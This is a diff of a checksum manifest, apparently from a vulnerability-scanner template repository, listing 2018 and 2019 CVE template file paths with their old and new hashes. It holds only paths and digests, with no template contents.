http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e -http/cves/2018/CVE-2018-19137.yaml:c2a6ba3d5e9b9e99a92af146ad5bfaf069bb5bbd -http/cves/2018/CVE-2018-19287.yaml:33b653d7730b28e8c86a70361cae669c6bb2b6bb -http/cves/2018/CVE-2018-19326.yaml:0af737b4f5788ffc62e2be1d4f3344ba6317cc0d -http/cves/2018/CVE-2018-19365.yaml:fbd77bc5cd41e696ac6a62af480daed27878502f -http/cves/2018/CVE-2018-19386.yaml:c413cba84837a70cc0a945b5fcdc6977084bfaa2 -http/cves/2018/CVE-2018-19439.yaml:643d392bcd2fe56e8672a9e3c6eba7795f09164f -http/cves/2018/CVE-2018-19458.yaml:4d892098268e9f256ed952ecfa4fd1928c5e664f -http/cves/2018/CVE-2018-19749.yaml:0ba1c203a55503618da056f2c3fded226e1ffd8c +http/cves/2018/CVE-2018-19137.yaml:fd1ff8c639e0ca4f776bbbd0238ca952db2985b1 +http/cves/2018/CVE-2018-19287.yaml:0a56cc461952fb23c4221d0aa334d5464bcf0d36 +http/cves/2018/CVE-2018-19326.yaml:8925ef0ecd6f677aa71bed2457d2f6114a3561dc +http/cves/2018/CVE-2018-19365.yaml:a8399476bc01fdd26608698aae3a117b711b1243 +http/cves/2018/CVE-2018-19386.yaml:2d44c5a61bb7061ad629e54b380561de2a35d38e +http/cves/2018/CVE-2018-19439.yaml:93557a94ecca5127e7adf1697cc5946754c64a21 +http/cves/2018/CVE-2018-19458.yaml:9a1c4ed1055bce227a906e29f4487473d6598c49 +http/cves/2018/CVE-2018-19749.yaml:6cd5dc9be2d13dc800a9ca4f6089838404803360 http/cves/2018/CVE-2018-19751.yaml:41a013ed8f511aaea82081e075916ed638b1ebab -http/cves/2018/CVE-2018-19752.yaml:e9439a1168e9ece18de6d17efee8c21b56c09b0d -http/cves/2018/CVE-2018-19753.yaml:15fa9cbdabde52665fc9494ad11b3d96c828fb76 +http/cves/2018/CVE-2018-19752.yaml:e3d17d1b2dea369da7e33fa13dcf56bb79d148de +http/cves/2018/CVE-2018-19753.yaml:1d0baa4a16b3ec969135a6dc642de67c854ec3a1 http/cves/2018/CVE-2018-19877.yaml:31aa058606935cc5babf7d592f92f87aeaf162ec http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 -http/cves/2018/CVE-2018-19914.yaml:0066fbbaaecd93a5331533ce5250f9f1cdc88bb1 -http/cves/2018/CVE-2018-19915.yaml:74c1d616359bb3b0d408eaa0788a481cfef9f3ef -http/cves/2018/CVE-2018-20009.yaml:a08180dd2954ea56039884a9d9ed6ca8592fe726 +http/cves/2018/CVE-2018-19914.yaml:08e33fa9f1fc8a7d48bfc23e9abb3401f0a7eefb +http/cves/2018/CVE-2018-19915.yaml:2c6e0242cea923049907f76a74b85edfab5183eb +http/cves/2018/CVE-2018-20009.yaml:975ad7802a4b86368020631067f9a6ddd0783d48 http/cves/2018/CVE-2018-20010.yaml:ec78911a377dfae9ce54f561a7d71ba449a741dd http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 http/cves/2018/CVE-2018-20462.yaml:70faa7b267536593d4b33427ff677d12deb57cce http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f -http/cves/2018/CVE-2018-20470.yaml:b5e4fedc8ecb0a2f546ceb1cb8a7d7335b5c2915 -http/cves/2018/CVE-2018-20526.yaml:34bd41e9b50ba58581afa0dd6afae67c646b6085 +http/cves/2018/CVE-2018-20470.yaml:f64b036510d604de04aaf2db6996aa9a248be4b0 +http/cves/2018/CVE-2018-20526.yaml:bdbb51d1ffa66cebc0ae6e78cf40726e8f97a2d9 http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:92f8a7591aa28384815ed06260df69c2a947a7b3 -http/cves/2018/CVE-2018-20985.yaml:194458d057278f25bcebeb4295bfc1e75e22e2a8 +http/cves/2018/CVE-2018-20824.yaml:e9c7b19a982fdbc77a7a6e97718392b2c6fbab01 +http/cves/2018/CVE-2018-20985.yaml:6e840038e5ef9a5d859f4d668036d2121b3fac40 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c -http/cves/2018/CVE-2018-2791.yaml:7c3a36e0a4569d572ebc6c68a27c05ba9954c4b6 -http/cves/2018/CVE-2018-2894.yaml:0200e340681ab7d80a4a65e7f68fee290e1b4660 -http/cves/2018/CVE-2018-3167.yaml:eb966a0c17861aad5f5880be966f81db060f622a -http/cves/2018/CVE-2018-3238.yaml:77bacb539f3e9165aee40b9ea3121c3515493ea1 +http/cves/2018/CVE-2018-2791.yaml:ec08db845d506ea70eef8190ff46cfbc3ddb4d06 +http/cves/2018/CVE-2018-2894.yaml:f262fb833059893aa4a51846e7312e53cf8844e7 +http/cves/2018/CVE-2018-3167.yaml:273f69df618572a6af4c29fb49751377ba38195f +http/cves/2018/CVE-2018-3238.yaml:5030ec913ae838ffaf3b60ca7be68a434aff3bbe http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:cb5fee3f952822eb41503ed9e0ccfabcf11dbb4e -http/cves/2018/CVE-2018-5233.yaml:3e16ec605d22bdd1ef14d5d40be4c53b357bea60 +http/cves/2018/CVE-2018-5230.yaml:65c5eec3102fa06c52d29003683038ce945e7a29 +http/cves/2018/CVE-2018-5233.yaml:2810f960e2057833a3a224cc7cf41556f23a6a2b http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:f3a7af05fa105dad10138b02f1c8fb0a4ecf3844 -http/cves/2018/CVE-2018-6008.yaml:14a67d10116ce31b085da9f244055d8f25983b01 -http/cves/2018/CVE-2018-6184.yaml:967c0a9b8cf7387710b3441ce7adf1ce9fcb7ff6 -http/cves/2018/CVE-2018-6200.yaml:ba9654d3be7c6f1bd0f84f570cc71d7e57310c0b +http/cves/2018/CVE-2018-5715.yaml:1c44d1785af1d90a1bf56c7d71710399f35ef6c4 +http/cves/2018/CVE-2018-6008.yaml:34f83b3b57e8d26d90647da2d70c4e7b7dd60380 +http/cves/2018/CVE-2018-6184.yaml:fc991ad3b4fc4ef0b2c379ec4795279b8b806f77 +http/cves/2018/CVE-2018-6200.yaml:dfead2b2caa43616b1debefbee4bf46566978351 http/cves/2018/CVE-2018-6530.yaml:a7ec85a12911cc378322baaa7a1912ca731ce631 http/cves/2018/CVE-2018-6605.yaml:9395411144d77cf69a9f241d6eac574be3803a3a -http/cves/2018/CVE-2018-6910.yaml:903ae5c396c04f04daf9053c58ea654f1963a26b -http/cves/2018/CVE-2018-7251.yaml:8515839e33ecc2baa648b143df5e68c105076f14 -http/cves/2018/CVE-2018-7282.yaml:8cd1e4ec21b036d28a97b466f79fcbcc690be192 +http/cves/2018/CVE-2018-6910.yaml:5cdd602b4a3ee04e69fd5bb65014b372ffd67e77 +http/cves/2018/CVE-2018-7251.yaml:3173253cec72ee76a5cb9d69a05f0339ee638caa +http/cves/2018/CVE-2018-7282.yaml:322b1e3e3ceb2f4b4c37b987be40cf148fbe1b61 http/cves/2018/CVE-2018-7314.yaml:bd70e733cbf74d122f249c148b42dab8ddacb60f http/cves/2018/CVE-2018-7422.yaml:e3c039258631c4bcd6be9a250683a659c30589e4 -http/cves/2018/CVE-2018-7467.yaml:87b61f122cb41ca9623cb6f8edcf80c468cad161 +http/cves/2018/CVE-2018-7467.yaml:714eccac0c1d375748ece0da2b87c68d27a461bd http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:9850afff4f55906fb1139177e9e3dbfa61ebefb1 -http/cves/2018/CVE-2018-7602.yaml:47454a60cd6aa10c718354b44932d1998e64beb0 -http/cves/2018/CVE-2018-7653.yaml:47938eaeab1aabf7c180a3e5171365fa5b74d912 -http/cves/2018/CVE-2018-7662.yaml:692f642bfb1c0cdb4d9dd8c2ad2f486b1c5af476 -http/cves/2018/CVE-2018-7700.yaml:f2883ec987ddc4aa27c177d6dcb4ef196c6392c3 +http/cves/2018/CVE-2018-7600.yaml:3d30ed4f3a3f787ed1a31a95852b86bcabafc09a +http/cves/2018/CVE-2018-7602.yaml:9528f0b81c634579fb58bf3feb93049ed6deac9b +http/cves/2018/CVE-2018-7653.yaml:d52e4702df453fcf5b2a641b564ada02cdc1f32e +http/cves/2018/CVE-2018-7662.yaml:d8f5272bb557b3f06386824fbd5ad3ac6d91f62f +http/cves/2018/CVE-2018-7700.yaml:339dc5c02de55e6e0589ac79da7425a56064185c http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:331b768d2e3fd9d5cdb64555452676db917d8150 -http/cves/2018/CVE-2018-8033.yaml:ffc9de217255a3b489ed7827f6d32a5947300261 -http/cves/2018/CVE-2018-8715.yaml:bdd0071830ede0ea7b268e3849730c8f57da3fd2 -http/cves/2018/CVE-2018-8719.yaml:346b89bd3df6b1c410ba889896c885c632bc89fd +http/cves/2018/CVE-2018-8006.yaml:11820c48004a18fd909fa35b6022d85c9203a9b8 +http/cves/2018/CVE-2018-8033.yaml:ed36027558a45eb525720fa1f9b07b85f65d2a05 +http/cves/2018/CVE-2018-8715.yaml:845d59d1e0942c3760c2d843b177157d5b31da54 +http/cves/2018/CVE-2018-8719.yaml:bfb5ceeb330f74172c117e625fe69e8e10197361 http/cves/2018/CVE-2018-8727.yaml:fc1c33f0a40fc19bbd5c77e8bc0a71e35d54e56d http/cves/2018/CVE-2018-8770.yaml:697c1ba6a15230f9f9f2ce2899ebefc4fc0ef068 -http/cves/2018/CVE-2018-8823.yaml:6240e96de514f9aba1a81835c2dbd5832e3452c0 -http/cves/2018/CVE-2018-9118.yaml:99050c924069419c5734ad95f623efc6fc3fb2b5 +http/cves/2018/CVE-2018-8823.yaml:841bfa50c0524f4b3dea7995e28c5c314b15ac27 +http/cves/2018/CVE-2018-9118.yaml:7bf016eaceeefb7d38e88c7841928d26f601f581 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 -http/cves/2018/CVE-2018-9205.yaml:1ad420199050d8151ceeed0158f0cc65e8a0d83a +http/cves/2018/CVE-2018-9205.yaml:ddc94395c8fd94dd7f3dfd5d521c88d2a18d1293 http/cves/2018/CVE-2018-9845.yaml:1d90b0a63da858688c950787f350bc620243c869 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:c7c29ec1c5146f4916c248baf33d35ec1ee897c1 -http/cves/2019/CVE-2019-0221.yaml:b250817b2755dfd6fb5b5549a57c64be696104a8 -http/cves/2019/CVE-2019-0230.yaml:c47d5979ba20771e55d02d06c0388a37d96774f6 -http/cves/2019/CVE-2019-10068.yaml:ede57fa772e37d944b2bbad95dff4aed5fdeaaf6 -http/cves/2019/CVE-2019-10092.yaml:b2e3395199c7f0544ed32a952fbea0ab78c1d6b6 -http/cves/2019/CVE-2019-10098.yaml:188c8d293a7ac0eda5d9399830acd7949730cc5a +http/cves/2019/CVE-2019-0193.yaml:1315152b6f01340007acd5426780992d9823ce27 +http/cves/2019/CVE-2019-0221.yaml:58497e316e0aa43087705825cf0b213ee8d13d21 +http/cves/2019/CVE-2019-0230.yaml:e303dedee56203e94933d761fc9ffd427f22b090 +http/cves/2019/CVE-2019-10068.yaml:372682e6aa3ccb83aaf474bccba5f4b103796745 +http/cves/2019/CVE-2019-10092.yaml:d9d774da89cff5cf78b56c38b569f2a093dab139 +http/cves/2019/CVE-2019-10098.yaml:5295a08794823dd689b4a8597f5d10f51191197f http/cves/2019/CVE-2019-1010287.yaml:cec033f9ac31aaf83bd80c9279ab5a7aed4b890a -http/cves/2019/CVE-2019-1010290.yaml:2491cf2d232dd906a98fbe5642dcbae2cf9e8dda +http/cves/2019/CVE-2019-1010290.yaml:fd5a6b728a89be5e21149ba9b9ddf9fd0add141d http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:d46cee080fd6b0439f42fa434811a990dc4c7a5f -http/cves/2019/CVE-2019-10475.yaml:fe98ab90766e49a8318e08eb2b785a538c4b54e1 -http/cves/2019/CVE-2019-10692.yaml:33c3a322fe78f5333c349ed4cfdd73eeaf02c4b6 -http/cves/2019/CVE-2019-10717.yaml:97a42e7d0d8d70011f73b784cf7ed1461d082819 -http/cves/2019/CVE-2019-10758.yaml:027f21cba689be168dde776353ca21ed461b7ecb +http/cves/2019/CVE-2019-10405.yaml:9c26c8436451083f65afdc4c91524a483af73c8e +http/cves/2019/CVE-2019-10475.yaml:4a159a11f75f8e287a519514c93eb55af3a1173b +http/cves/2019/CVE-2019-10692.yaml:b6b4abd2fcde505f79a4b4c2c942ed242d967edd +http/cves/2019/CVE-2019-10717.yaml:087d9a5aa47b927d396fc4b7752b03de3782ebbf +http/cves/2019/CVE-2019-10758.yaml:3a79381a7eeb08f38bd8f5f6c862fc7c1f05c5d6 http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:e513466e6a8225282d03a52e95aac657c3635801 -http/cves/2019/CVE-2019-11370.yaml:b1afe7865d4f77c2faab385d378e05cf751abe95 -http/cves/2019/CVE-2019-11510.yaml:ea7827a092876f789f83de6dd697bcf94600548d -http/cves/2019/CVE-2019-11580.yaml:bd10ff77f8580bb8646fb88dc4f4182b3ffb2aa8 -http/cves/2019/CVE-2019-11581.yaml:28960518b8b5a5994bd2d4c9af1abab769731c1b -http/cves/2019/CVE-2019-11869.yaml:93e7f80a12230e015d74027c713eee71c5590bfe -http/cves/2019/CVE-2019-12276.yaml:c3bdc5c82f72ba0c13f88a08f95e3723c78a1c5b -http/cves/2019/CVE-2019-12314.yaml:527325ce98178f09e5924d54b9da59840ecff8ff -http/cves/2019/CVE-2019-12461.yaml:6676099ce71d856e2cf5cd1added94e71187cc53 -http/cves/2019/CVE-2019-12581.yaml:2e14cefaf11f6357909c51c0f04751f11dabf1e3 -http/cves/2019/CVE-2019-12583.yaml:5508d09c101b84a227a291643bf3ac2d397c1c8b -http/cves/2019/CVE-2019-12593.yaml:771cf4be64480ac1c69fd930caeb8b3600c80fd1 -http/cves/2019/CVE-2019-12616.yaml:a6b7ecc16eb77ea1b79242b08b0c0ec39f44246f -http/cves/2019/CVE-2019-12725.yaml:c36c20e3da08dde916d4f66e398ca9e7d3d3ffd0 -http/cves/2019/CVE-2019-12962.yaml:f6d0a88bbb503a2dd35e432316c8135560653fc9 -http/cves/2019/CVE-2019-12985.yaml:c26aca95af03c4210d31919266ce3fdefd93f2dc -http/cves/2019/CVE-2019-12986.yaml:1fa79618b0b2d1c242827287d0654fe1c3c0e352 -http/cves/2019/CVE-2019-12987.yaml:a9cddb20e5ba61ad1bc2f9c5e77c82298128e116 -http/cves/2019/CVE-2019-12988.yaml:03a311fa57658b1a5a89db828a3086203d96e8ea -http/cves/2019/CVE-2019-12990.yaml:91a4855399327e0cbda984159a1d60065c0b11ab -http/cves/2019/CVE-2019-13101.yaml:2f3f80e7abb91b1ba7f931deeea7370758f573c4 -http/cves/2019/CVE-2019-13392.yaml:24ece9b94191ef8f7e73dd0ce9437291823e8ae1 -http/cves/2019/CVE-2019-13396.yaml:9d5455cc901f005e72fdcfeb31551a05fcf4c240 -http/cves/2019/CVE-2019-13462.yaml:20f3e07c707031e0ff23785c1cf5b2a8da67dd25 -http/cves/2019/CVE-2019-14205.yaml:15701d3bd55fccb335fdd621d141bcf61d0d35f8 -http/cves/2019/CVE-2019-14223.yaml:46c68bd0548a57887393c5fe289c29a58a81a853 -http/cves/2019/CVE-2019-14251.yaml:87a40374483653f3b24d40ee8c36cb8b9da1001a -http/cves/2019/CVE-2019-14312.yaml:917f09b53b496e106194444088de1c3b05a1fda8 -http/cves/2019/CVE-2019-14322.yaml:a5f9ac480498a1eac7251123ba3589ff1948eb49 +http/cves/2019/CVE-2019-11248.yaml:5124a8a18753e96e412cceb36a590249f61fc296 +http/cves/2019/CVE-2019-11370.yaml:df484ba9eda9562fce57052043fe7e6bcc20c892 +http/cves/2019/CVE-2019-11510.yaml:37ce5da29efdabcad9bbe9ed562d39ff4af92988 +http/cves/2019/CVE-2019-11580.yaml:0960dfb042ac587bf860280f1c682f7c95ebc4d8 +http/cves/2019/CVE-2019-11581.yaml:f29ac5a617fd6582e8416d89f0e96fc75fee02fd +http/cves/2019/CVE-2019-11869.yaml:554296f0a9b3b597f433271e96c94945b1a1e2eb +http/cves/2019/CVE-2019-12276.yaml:d46baca1545e6e8549012c7397daf86a7a6b23e4 +http/cves/2019/CVE-2019-12314.yaml:b86487969cfe1c1e84e842d93a500fb71e3964fa +http/cves/2019/CVE-2019-12461.yaml:3068bf62d30fc8534e65663178590794413f5aaa +http/cves/2019/CVE-2019-12581.yaml:6543be0bceac3b6b2e2f725167baeacccc790117 +http/cves/2019/CVE-2019-12583.yaml:ea1f2ee731644d9b9ff35227124b5f9deedc57ff +http/cves/2019/CVE-2019-12593.yaml:73dc1dd1b2adcf7e32f17dfd589b907e7b9856c5 +http/cves/2019/CVE-2019-12616.yaml:cb73607b6fa9ebb0e404e6fd23a996b5f567a2d4 +http/cves/2019/CVE-2019-12725.yaml:ed7b7dd0f24be6fc9e460590f4ed3cab3430b5c1 +http/cves/2019/CVE-2019-12962.yaml:4799a7b0f606ddb24efafe013cff6f4993535b96 +http/cves/2019/CVE-2019-12985.yaml:014126b5bea9dec1b4e8f11d2ae3b711f037b376 +http/cves/2019/CVE-2019-12986.yaml:05937e0d453d00b1c43afd669e3774b7d5bf06a4 +http/cves/2019/CVE-2019-12987.yaml:282eff1208d350bf7bebfa8827f318c133bb66c9 +http/cves/2019/CVE-2019-12988.yaml:197577eac25a532f0584f5822f1c60392d838f05 +http/cves/2019/CVE-2019-12990.yaml:9e48d7926d2162a4aef49feac4d58cd390d04f82 +http/cves/2019/CVE-2019-13101.yaml:a2a632e54cddccaee9effe4844f8a873b728dc35 +http/cves/2019/CVE-2019-13392.yaml:17334f15559dd076fab6f71057a6d17bd81e6479 +http/cves/2019/CVE-2019-13396.yaml:edc16e834ab7130bd4a78f1dce409fe9bb1a2297 +http/cves/2019/CVE-2019-13462.yaml:d5f61f3b4adc7f30143d5cb225f9529d89ba0b69 +http/cves/2019/CVE-2019-14205.yaml:794ebe6439f61bfe64973e2790e46f152ceb55b0 +http/cves/2019/CVE-2019-14223.yaml:bfa751b74191106c210a2899db25813c7ff78181 +http/cves/2019/CVE-2019-14251.yaml:e5edfce134c1c8362fec90ac0650c81dfc2ca49f +http/cves/2019/CVE-2019-14312.yaml:128399e7d4367691df73cd65e3e74aee03220533 +http/cves/2019/CVE-2019-14322.yaml:8a5f7120a05939ac777c37d4265cac8d83a8e347 http/cves/2019/CVE-2019-14470.yaml:feb43273bc10cccf96b8e1fdfa8c3973442039ad -http/cves/2019/CVE-2019-14530.yaml:38077bc014a9a67fbaf899b1484eba0a50490540 -http/cves/2019/CVE-2019-14696.yaml:6f9b00b60a40272588e4a78312dfd0b0ee3fa0e7 -http/cves/2019/CVE-2019-14750.yaml:a5e8aec0b9c69f98080689162568cfda133e4518 -http/cves/2019/CVE-2019-14789.yaml:52abb08c5ec63ee098eda54de1ee83cd7d8560db -http/cves/2019/CVE-2019-14974.yaml:3632d41dca903c1560913829655e9d4e21c6dcf8 -http/cves/2019/CVE-2019-15043.yaml:c5ad4bc4b8d5454c9ed36d6f817dc654957a7185 -http/cves/2019/CVE-2019-15107.yaml:d8b013d16f302e17b91dda1a204c48cf24d62f2a -http/cves/2019/CVE-2019-15501.yaml:6f3de198f181fbdccd72ffd028c62355bb453bb8 -http/cves/2019/CVE-2019-15642.yaml:058c7b06499c1aa2814a63bc2f8ff7f5beaa7ac3 -http/cves/2019/CVE-2019-15713.yaml:f736796b425915557a0af038f5787cb7ca2f724f +http/cves/2019/CVE-2019-14530.yaml:a21235c8b43e59e40ad7d3c2372f53d54c794e99 +http/cves/2019/CVE-2019-14696.yaml:1d95b7c9e1cd841802f6ff592239bb2da0ebf1bf +http/cves/2019/CVE-2019-14750.yaml:6ca5ded0c6a2a0b01ec4fbd07a1c9d316532590d +http/cves/2019/CVE-2019-14789.yaml:9e084e98af571982c3541d7b6df97d5d4b5371cb +http/cves/2019/CVE-2019-14974.yaml:fab66c9fa2671fd957b866861070cf1f0c449e35 +http/cves/2019/CVE-2019-15043.yaml:2d8e17268051d372dd87356dd19d8ca95a03fd7a +http/cves/2019/CVE-2019-15107.yaml:a16ecd8b3d5b44ace9cc052b714f37939fb71209 +http/cves/2019/CVE-2019-15501.yaml:0ec7b6f2b9c32e42fafcea63e3fae54f222029e4 +http/cves/2019/CVE-2019-15642.yaml:19722b53950dd208a69868820a54683b5f9df13d +http/cves/2019/CVE-2019-15713.yaml:781dff249c59787481d73a69c64aacd876696fd6 http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:10a768c5e67f47db275127cc984d5b213b712e3f -http/cves/2019/CVE-2019-15858.yaml:a0e635f52e1fd2adc2edaa9d5bb8b4c55bfd2061 +http/cves/2019/CVE-2019-15829.yaml:04ddd730b7a1a6d44a336c026f75498bae79bec9 +http/cves/2019/CVE-2019-15858.yaml:eb8403399fcdbd8ce9a21529f60bfbf5988e172d http/cves/2019/CVE-2019-15859.yaml:45fdb86453346868de8338e41b0f108ee04042fc -http/cves/2019/CVE-2019-15889.yaml:bfefd89b0c46d2c26f9775821e1343b0877985e1 -http/cves/2019/CVE-2019-16057.yaml:52a4c6bc1414158b67c4ac5b42602b00fdce0030 -http/cves/2019/CVE-2019-16097.yaml:5a77bf9488ebe350646f38535af69ddaf02d019c +http/cves/2019/CVE-2019-15889.yaml:e7a0826e403bb9e010db73d1b13501080fd0217c +http/cves/2019/CVE-2019-16057.yaml:78eb40dc6d8f29b5201301f3c2bc6f04eebfdd1a +http/cves/2019/CVE-2019-16097.yaml:1cdd486d70f786e7904e3a7d94a8dd7cbf1ef8df http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 -http/cves/2019/CVE-2019-16278.yaml:828e6973ee7c8331a4e0e17076cc14d5f643756d +http/cves/2019/CVE-2019-16278.yaml:2cbf9691cd4104d2b340cd4d5e6925a41df947e3 http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 http/cves/2019/CVE-2019-16332.yaml:6fc333ecc72bb9ae7f7cf1a81bf0e63501faee48 -http/cves/2019/CVE-2019-16469.yaml:b25f446b76a766a49987b92379d672217833ddb3 +http/cves/2019/CVE-2019-16469.yaml:6e85e9115e6650cd09da4d24f619843b9bc7ac11 http/cves/2019/CVE-2019-16525.yaml:51db7d84c840ddecfabe91c8b79dffc9e85b0700 http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce -http/cves/2019/CVE-2019-16662.yaml:76915baaa112a1a4584d7b3a28d3fd5c1ee2e216 -http/cves/2019/CVE-2019-16759.yaml:706469cd6c38ad257f95775393dd69e0ac289a5d +http/cves/2019/CVE-2019-16662.yaml:74f125a17be26af500bd726d9b5ab3861d713e2a +http/cves/2019/CVE-2019-16759.yaml:cbf9b83765f0228de77c73210d6d419fd8fd442c http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 -http/cves/2019/CVE-2019-16931.yaml:c246ea9699795a7cebfe29496f7b2efdee99d70d +http/cves/2019/CVE-2019-16931.yaml:d23e42b9b1dfd58ff1c5a89e26993c94e1cfd7b7 http/cves/2019/CVE-2019-16932.yaml:752a6400d3e725e0709b45b312927f30d3d82162 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac -http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 +http/cves/2019/CVE-2019-16997.yaml:32f2b19fd4b728b9f693d17169d7f74b32689d68 http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 +http/cves/2019/CVE-2019-17382.yaml:de2261176c45bd15fbfbdae01f6bf94e23cc57e3 http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 -http/cves/2019/CVE-2019-17444.yaml:d6edba4d216bc8c9a4592ee9455ff7c7e9279a1a +http/cves/2019/CVE-2019-17444.yaml:c6adc210bdcaf5fcbf8dc37346fabe38ebacd346 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d -http/cves/2019/CVE-2019-17538.yaml:6ee1fff5d758343db188de36fd0daf2c451c6c42 -http/cves/2019/CVE-2019-17558.yaml:f20a87b60a1601a2db4f365919c9cb223a362ded -http/cves/2019/CVE-2019-17574.yaml:57b052c0181498af298b110600687f6e85687032 -http/cves/2019/CVE-2019-17662.yaml:976666face26cda5c5604d59a5c494e127d64181 -http/cves/2019/CVE-2019-1821.yaml:12907634331acd7a34c3c1708e2d1d2f3faed7d9 -http/cves/2019/CVE-2019-18371.yaml:7b787967a5b266feccbe4583a765ae00f2967538 -http/cves/2019/CVE-2019-18393.yaml:f802be60a9ff03dc5b39a853f584e643fb6d3c2d -http/cves/2019/CVE-2019-18394.yaml:ebd3d137ec974702ffc2ab350d3e124c26b98aa9 +http/cves/2019/CVE-2019-17538.yaml:7a34111b1b615caf71f0d479eb8b6cc5e465ac29 +http/cves/2019/CVE-2019-17558.yaml:8f153604065b9c7744bd2246865b2e87c00e053b +http/cves/2019/CVE-2019-17574.yaml:892d01b36db1255d8007f717c1fb6c4d4f802588 +http/cves/2019/CVE-2019-17662.yaml:e6e3f40e798aad8fd78fb6f897f0a7ecae4a817d +http/cves/2019/CVE-2019-1821.yaml:d19e01b6b92ea25c70d576bb415da93aee8d4f0f +http/cves/2019/CVE-2019-18371.yaml:cb87df6d841c8de310c9421503698b22fe4689a7 +http/cves/2019/CVE-2019-18393.yaml:2fa5d07a297e08f62fe65b85a66468d1e91456e2 +http/cves/2019/CVE-2019-18394.yaml:f58089be77e0e2f5e5a34839f3c60d4715924666 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 http/cves/2019/CVE-2019-18922.yaml:95118c0faac56d9ab7f7c0731d9ffd8d37413f74 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:048b57c805e227ddcc3c21c978505b63a5d566ed +http/cves/2019/CVE-2019-1898.yaml:f0f71275ec7d10e813cd556632ba7342580eced0 http/cves/2019/CVE-2019-19134.yaml:3db2b49e04e2ee29182af1285b416361be36a428 -http/cves/2019/CVE-2019-19368.yaml:17ca39c57aa39b08bbc6ef746db6453d8adb2694 +http/cves/2019/CVE-2019-19368.yaml:dd2b3f21190be0cf7506aa1910fce2e2ac085baf http/cves/2019/CVE-2019-1943.yaml:866d0aa9df67c656e9ff6b133d795e5da483b26b http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a -http/cves/2019/CVE-2019-20085.yaml:f7fa88b2bcceac1f29b34acf3501461b662dcf50 -http/cves/2019/CVE-2019-20141.yaml:33c2eb017289fb6ee525f7e726c33492b6ab63c8 +http/cves/2019/CVE-2019-20085.yaml:b12a595f2f94c500147d19dc78114c8fb8b4d23f +http/cves/2019/CVE-2019-20141.yaml:ff23736b1373f16c104fcb0994fd115aa0dbd943 http/cves/2019/CVE-2019-20183.yaml:09eb91b7f52447d8655a37ed4bbe95300e7378bf -http/cves/2019/CVE-2019-20210.yaml:847f5403c0142e68850a5e3450ef3e249185e47d -http/cves/2019/CVE-2019-20224.yaml:fc85be3c997670ca1e5348b607ccf41e4d55b93c -http/cves/2019/CVE-2019-20933.yaml:db1e4b83b1104779afef526475ed1c95666d4be1 +http/cves/2019/CVE-2019-20210.yaml:33c5ab4fb84e026a52a44b982f8a3c68753ac9d4 +http/cves/2019/CVE-2019-20224.yaml:63c371fdb3627b07c5ca57bc82234ce2fd73dbf1 +http/cves/2019/CVE-2019-20933.yaml:b4ff75ea2a14351ba4455cc2049a5367d33bb5f6 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 